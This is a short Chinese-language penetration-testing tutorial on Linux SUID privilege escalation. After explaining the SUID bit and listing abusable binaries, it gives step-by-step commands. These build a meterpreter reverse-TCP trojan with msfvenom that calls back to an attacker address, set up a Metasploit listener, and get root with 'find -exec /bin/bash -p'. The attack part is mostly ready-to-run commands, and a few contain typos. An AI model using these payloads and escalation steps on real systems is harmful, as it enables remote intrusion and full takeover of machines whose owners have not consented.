反弹shell通过普通用户进行SUID提权

SUID

当执行的文件被赋予了s权限，也就是对UID进行Set操作，简称为SUID的特殊权限

Linux中修改用户的passwd就是个进行Set UID操作。如果普通账号tom需要修改密码，就要访问/etc/shadow，由于/etc/passwd文件是所有用户都可读的，如果用户的密码太简单或规律比较明显的话，一台普通的计算机就能够很容易地将它破解，因此对安全性要求较高的Linux系统都把加密后的口令字分离出来，单独存放在一个文件中，这个文件是/etc/shadow文件，有超级用户才拥有该文件读权限，但是该文件只有root能访问。那是怎么修改的呢？

运行该程序时发现被赋予了s权限。当tom需要修改密码，passwd程序的所有者为root，tom用户执行passwd 程序的过程中会暂时获得root权限

提权原理：

查看当前具有SUID权限的用户，再利用具有SUID权限用户去执行需要的命令

可用来提权的linux可行性的文件列表如下：

• nmap

• vim

• find

• bash

• more

• less

• nano

• cp

赋予/取消s权限命令：

赋予s权限：chmod u+s /usr/bin/find

取消s权限：chmod u-s /usr/bin/find

以下任意一个命令都可以查看系统上运行的所有SUID可执行文件，一个一个试：

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000-print2>/dev/null

find / -user root -perm -4000-exec ls -ldb {} \;

Linux通过反弹shell获取普通用户权限

1）通过msfvenom构造木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.200.140 LPORT=8888 -f elf > mshell.elf

2）启动msf，设置监听，查看需要配置的参数

use exploit/multi/handler

show options

3）设置监听地址，端口，payload

set lhost 192.168.200.140

set lport 8888

set payload linux/x64/meterpreter/reverse_tcp

show options

4）通过运行木马获取meterpreter会话

exploit

5）获取shell，查看当前权限

shell

whoami

6）查看具有root用户权限的SUID文件

命令如下：

find / -perm -u=s -type f 2>/dev/null

7）利用find文件提权

首先创建一个a.txt

touch a.txt

8）先看一下是否能用find命令以root权限运行

命令如下：

/usr/bin/find a.txt -exec /bin/bash -p \;

查看当前权限为root，则成功提权